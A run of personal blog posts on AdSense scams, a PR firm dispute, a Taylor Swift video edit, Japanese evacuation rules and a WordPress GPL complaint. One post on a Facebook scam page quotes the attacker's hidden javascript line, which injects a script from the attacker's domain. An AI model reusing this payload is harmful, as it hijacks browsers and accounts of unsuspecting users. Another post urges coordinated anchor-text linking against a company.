No, really…

I think this may be a sign that I am watching too much The Walking Dead.

By the way, this would look great on you or your boyfriend/girlfriend on a t-shirt!

It has to be tough policing a program like AdSense. It must be exceptionally difficult during the holiday season, when the payoff to running scams grows so much more. It is so tough, in fact, that this year as the holiday shopping season grows near, with Black Friday just a few short days away, that apparently Google has finally decided to say “fuck it”, make it easier on themselves, just remove the ability for anyone to report any violations of the program whatsoever, and allow the scammers to have a field day in the mean time.

While Google may want to give the impression to their stockholders and the public that they have both the search engine spam and advertising program cheaters fully under control, the truth is that they rely quite a bit on reports from the community and consumers for both spam and AdSense violations. For any spam that they find, Google asks people to submit a Google spam report. At this point they require that someone log in before actually filing the report itself. This makes sense, since it helps prevent people erroneously filing large amount of spam reports against their competitors. For the AdSense violations they supply a separate form that does not require a log in, titled simply Reporting a Violation – AdSense Help. Usually I don’t run into offending sites with AdSense on them that fill me with enough of a sense of civic duty where I feel compelled to actually fill out a report, but I happened to land on one such today that actually tricked me into clicking on an ad in such a way that it really did annoy me. The page I landed on was BigSiteofAmazingFacts How Much Does The Earth Weigh (yes, I was distracted by trivial shit again, don’t judge me), and in the right sidebar there was what appeared to be an embedded Youtube Video from Family Guy:

Still distracted (of course) I clicked Play on the video, only instead of playing it suddenly brought me to a site trying to sell me bras. So, thinking I must have missed the rather large video in the sidebar when I tried to click on it, I hit the back button… and noticed that suddenly the video was gone altogether, and where before I had seen 2 AdSense blocks and a video, now there were 3 AdSense blocks instead:

I hit refresh a few times but the video didn’t return. At that point I realized that it was actually a scam, so I cleared my cookies for that domain, hit refresh again, and viola, the “video” reappeared once again. At this point I was sufficiently irked that I actually decided I was going to report this asshole. It’s bad enough that a site with crap content like this is ranking #1 (the weight of the Earth is increasing each year from salt from the ocean spray? Seriously, wtf?), while people with content that is just fine are getting penalized supposedly from the Panda fallout. To add in that the guy who owns the site is ripping off advertisers as well just makes it so much worse. So, I headed on over to the AdSense Violation report to be a good citizen… and I was greeted by this:

An essentially blank page, with only a header, navigation, and a box asking me to tell AdSense how they can improve. Go figure.

From a financial perspective it does make sense for Google to make reporting AdSense violators more difficult, especially during the holidays. People who run scams like this actually generate Google money through the AdSense program, a program which currently has absolutely no oversight. It is exactly this lack of oversight that means that Google is the only one who knows how much, if any, of the advertising dollars are credited back to the advertisers once these scams are revealed. Hiding the violations report means that much fewer sites will be reported, more scams will be able to run for longer periods of time, and more money will wind up in Google’s pockets.

Is this profit motive really the reason that the report form is missing? If you ask Google I am sure they would say “of course not, we’re Google, you can trust us”. And since everything with Google is proprietary “behind closed doors” trade secrets with them, there is no way to know exactly how many violation reports suddenly went missing that apparently no one has noticed yet. My hunch though is that with something like this, as online shopping hits the holiday rush, the lack of reports that are coming in at the moment is actually too big for them not to have noticed by now, and them not fixing it for this long must be at least in some part intentional on their end.

Update: As Jen from JenSense.com pointed out in the comments, there is another newer page available where you can actually file the report located here. However, I am not sure that makes it any better, and may in fact make it worse. I wound up on the empty page by actually going to Google and searching for [report adsense violation]. The page that Jen provided is in the list, but it is down under the blank page that I found, another unhelpful blank page, and underneath a list of discussion of other people looking for the form. This begs the question… why did Google leave an otherwise empty page behind with just enough text (ie. header and title) and all of the old link juice there to outrank the “real” form? If they redesigned the site, then why not 301 redirect the old form(s) to the new one? It’s not like they don’t know how search engines work, ya know?

“True Love means never giving up” – many a stalker were born from this one innocent sounding phrase.

The truth is much less pretty than the actual picture.

[cue elevator music]

Ok, good, you’re back. If you followed some of the aftermath in the comments, on Twitter, and on various media outlets and celebrity blogs around the web (including Gawker and Wil Wheaton), you can tell that Jenny obviously has a large amount of supporters who were less than pleased at Jose Douche Canoe Martinez. The outcry got just loud enough that Brandlink Communications actually started to play the wounded bird card:

Apparently Jose Martinez felt so victimized from the whole experience, he actually decided that he needed to delete his entire Twitter account (or, of course, it could be that he was trying to do the internet equivalent of burning the evidence of his douchiness).

Quick side note: if a PR company’s first instinct when they come under fire is to duck and run, and get defensive, as opposed to owning up, making it right, and the moving on, then odds are that same PR company would not hesitate to throw a client under the bus if they felt it was necessary for their own self preservation. Anyone who is researching this company with the possibility of hiring them should probably keep that in mind.

Either way, I guess Jenny didn’t realize quite how much support she would receive, so she wound up actually asking her followers to put away the pitch forks:

UPDATED: I love you people. Really. Thank you for always having my back and for being so supportive during this weirdness. Jose has apologized, and I’ve been assured by the woman in charge of the company that they are aware and are handling it the best way they know how, so let’s give them some air and let them have the chance to do that. *deep breath* – Jenny Lawson, aka TheBloggess

Ok, so, maybe Jenny is right. Maybe some of her fans did get abusive towards Jose in the process of defending her (which, btw, I did not see myself, but I am guessing not everyone was polite) and it is time for us to let cooler heads prevail. However… I also don’t think this should fall just into internet obscurity, either. People who are looking to hire this PR firm should be able to find out who it is they are dealing with, and the first line of defense when doing research on a company is, of course, Google. Currently when you do a search for [brandlink communications], someone else’s post about Brandlink and TheBloggess is #1 (as a news story though, not as a regular listing), Brandlink Communications themselves show up next (which is actually the natural #1 listing, when no news stories show), and in the natural #10 spot is Jenny herself:

(Click to enlarge)

The news piece is of course only there for a short period of time, as all news pieces should be, and the rankings Jenny’s site has currently are probably also due to what Google refers to as QDF, or Query Deserves Freshness (where a particular search might warrant different results due to topic being “hot” at the moment). However, I think that Jenny’s site should be in the top 10 when searching on that company, even after the buzz dies down… possibly even #1. Therefore, here is what I suggest, if you happen to support Jenny in this issue:

1. Write a post showing your support for Jenny about the way she was treated. Don’t attack or “bully” anyone in the post, because despite them being in the wrong here Brandlink was right, bullying people is still wrong (although calling someone a douche canoe when they actually are one is just being descriptive imo)
2. In that post, link to Jenny’s blog post about the conversation, but use the phrase [brandlink communications] as the anchor text for the actual link.
3. If you link to the post more than once, make sure that link is the first link to the post.

For those of you wondering why, it is because links are still the number one factor Google uses when determining rankings. If you want more information on it, you can Google [santorum] and do some research… just don’t click on the first link.

Do I think this is too harsh? Perhaps if they weren’t a PR company boasting W Hotels and Chase as their clients I might be more inclined to go easy on them. However, even if they weren’t big shots treating those they regard as the “little people” like shit, there is also the fact that this behavior is not new for Jose, and there is evidence of him treating people like this all the way back to early 2006. The fact that the same guy is still VP Media Director 5 1/2 years later, still behaving the same way, makes the promises from the company that is “handling it the best way they know how” somewhat hollow. So yes, with that in mind I think that a response like this is quite fitting. Vote with your links, people, as Google intended you to.

In which Taylor says “um”, “like”, talks like a Scotsman, laughs, and sometimes gets excited. Sure, she said lots of other stuff too… but I didn’t include any of it in this video.

Proof that Taylor can make you smile regardless of what she is saying:

I did not change the order or duplicate anything, I just removed the in-between talking parts. You can view the original video here:

YouTube Presents Taylor Swift

From a technical standpoint probably the hardest part was getting the “ums” separated from the surrounding words, due to the fact that often Taylor speaks quickly in this interview, and some of the words ran together. For instance, many of the “and um” combinations kept coming out as “dumb” when I tried to isolate them, although I think in the end I did a decent job of pulling them all out. I did wind up missing a few I just couldn’t get though.

On a side note, I was looking at some of the comments on the original video, and I was shocked to see that there are some downright Taylor Swift haters out there. I honestly don’t get it. I am not referring to the “oh, I really don’t like her music” type of people, but rather people who what I can only assume are completely consumed by self loathing posting some seriously ugly stuff. Just a heads up in case anyone of that genre finds their way here or comments on the original video, I will simply delete anything that appears to be hate driven from the comments. This video is in no way meant to make fun of Taylor. Many people talk this way, and the interviewer was just as bad.

Facebook has never been known for it’s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don’t, with only a minimal amount of technical know-how required (ie. how to sign up, and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about “scareware”, or “phishing scams”, or even how to clean a virus from their machine if they get one. Sure, they’ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, everyone is on Facebook… it must be safe. The result is a gigantic community of gullible marks just waiting to be exploited or infected by scammers and hackers.

That is why a couple of years ago I wrote a post on how to prevent getting hacked on Facebook (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be sure you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.

For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the iframe hack. For those of you who don’t, or who are not familiar with html, an iframe is an element on a webpage that allows you to embed a second webpage into it. It’s very common and a perfectly normal feature of the html language. Iframes in and of themselves are not dangerous. Google AdSense , when shown on a webpage other than Google, is in an iframe. The same goes for Facebook “Like” buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that you only ever embed iframes from sites you trust. The reason this is so crucial is because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nadda. Zilch.

The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It’s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.

Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to utilize iframes into Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend’s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter in a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That’s what I saw what was going on. This is what the page looked like with normal styles turned on:

(click to enlarge)

Clicking that button then revealed these instructions:

What was not revealed, however, was the hidden <textarea> containing Javascript code that would then be fired if you did follow those instructions:

<textarea id="c">javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)</textarea>

This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it’s all downhill from there.

Of course, odds are pages like this won’t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no “This page is hacking users” option. In fact, if you look at the “Like” counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a legitimate page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.

The bottom line is that Facebook not addressing these issues and removing the ability to embed iframes borders on negligence. Currently the FTC goes after companies and organizations that do not adequately protect their user’s data:

Maybe they should start taking a look at companies that don’t adequately protect the actual users as well.

(click to view full sized)

You can click here to view the actual search.

When the tsunami hit I was a little freaked out until I heard from him that he was ok. Then the issues started to happen with the nuclear reactors and I and a few other people started to worry again. On Thursday, March 17th I saw this on Facebook:

we are being evacuated. i should be stateside by tuesday. they’ll put us to work at base schools somewhere, not sure where. don’t know if or when i’ll be back in japan. it’s possible i’ll never see the contents of my home again, and i can only bring 1 suitcase. imagine that.

Myself and everyone that knows him was so relieved, until the next day:

teachers are being told we are “essential personnel” and therefore NOT part of the voluntary evacuation. we have no idea what’s going on. but for now, i am safe and warm.

I was like, wtf? Essential to what? Why the hell would they force the teachers to stay behind? What’s more, it looks like families of military personnel have a better chance of bringing their pets than the teachers have of getting out of there:

The teachers of our military families’ children on military bases in Japan are not being allowed to evacuate with everyone else! Schools on the bases are closed, but their jobs are being threatened if they leave on their own. Meanwhile, evacuees can bring 2 pets.

From the Stars and Stripes story, “Navy posts Q&A about ongoing voluntary departure in Japan”:

“Horses, fish, birds, and rodents are not authorized transportation.” – nor, apparently, are teachers.

I don’t get it. I also don’t get why, as far as I can tell, Stars and Stripes is the only one talking about this:

No CNN, no New York Times, no Washington Post, no Huffington Post, no BBC even… no one seems to want to carry this story. Why?

My prayers go out to everyone in Japan right now, but especially to those who are being told they are not allowed to leave.

From: Michael VanDeMar <michael@endlesspoetry.com>
To: license-violation@gnu.org
Subject: GPL Violation

Hello,

I would like to report a violation of the GPL v2 license by the Worpdress Foundation with their blogging platform script, WordPress. There is an MIT license violation in the same product, which may make it 2 violations under your jurisdiction since they are mixing licenses and then licensing the whole as a single GPL product. The current version of the package , which is 3.0.5, can be download from here:

http://wordpress.org/download/

There is a binary included in the package that has neither the source code nor a written offer to provide it included with the package itself. This has been been the situation since version 2.5, which was released in March 2008, and all versions have been in violation since then, and all are still available from their website here:

http://wordpress.org/download/release-archive/

The binary file in question is located, sans source code or written offer for such, in the following directory of the distribution package, in both the zip and tarball archives:

/wordpress/wp-includes/js/swfupload

The file is named swfupload_f9.swf in WordPress 2.5 and simply swfupload.swf in WordPress 3.0.5. There may have been other name permutations included in the various releases over the years. Additionally, that particular binary is licensed under the MIT license, but there is no license accompanying the file. Also missing appropriate licenses are the following components:

/wordpress/wp-includes/js/imgareaselect (dual MIT and GPL)
/wordpress/wp-includes/js/jcrop (MIT)
/wordpress/wp-includes/js/jquery (dual MIT and GPL)
/wordpress/wp-includes/js/thickbox (MIT)

This has been reported to the developers via their bug tracking system. However, they are arguing that they are not required to follow the terms set forth in those licenses:

http://core.trac.wordpress.org/ticket/16517

I have done a writeup on the issue here, and you can further see the developers arguing their point in the comments section:

http://smackdown.blogsblogsblogs.com/2011/02/18/as-it-turns-out-wordpress-itself-is-not-100-gpl-compliant-after-all-and-they-violate-the-mit-license-as-well/

In addition to submitting this report it would be appreciated if some opinion on the WordPress developers claims about why they are not required to comply with those sections of the GPL could be given, and if they are indeed in error, why. Also appreciated would be an opinion on the impact, if any, of any derivative works based on those improperly licensed versions of WordPress.

Please feel free to contact me if you need any further details. Thank you.

-Michael VanDeMar

After I sent it I realized that I needed to clarify why I was writing them, since the FSF is obviously not the copyright holder of the various scripts that are in violation, so I sent this as well:

From: Michael VanDeMar <michael@endlesspoetry.com>
To: license-violation@gnu.org
Subject: GPL Violation

Hello,

By the way, I understand that the FSF is not the copyright holder on WordPress. However, they are claiming that they only offer products that are 100% GPL on their website which is apparently not true. Since the FSF is the copyright holder of the actual GPL license, and WordPress is one of the most publicly visible GPL proponents out there, I do feel strongly that this affects you as well. Even if legally there is no recourse for you to force them to abide by the terms of the GPL your input in this situation is valuable.

-Michael

And I do feel strongly about this. I think the attitude that supplying the actual source code isn’t the essence of and absolutely required for something to even be considered GPL in the first place is ridiculous. I will update this post with whatever response, if any, I receive.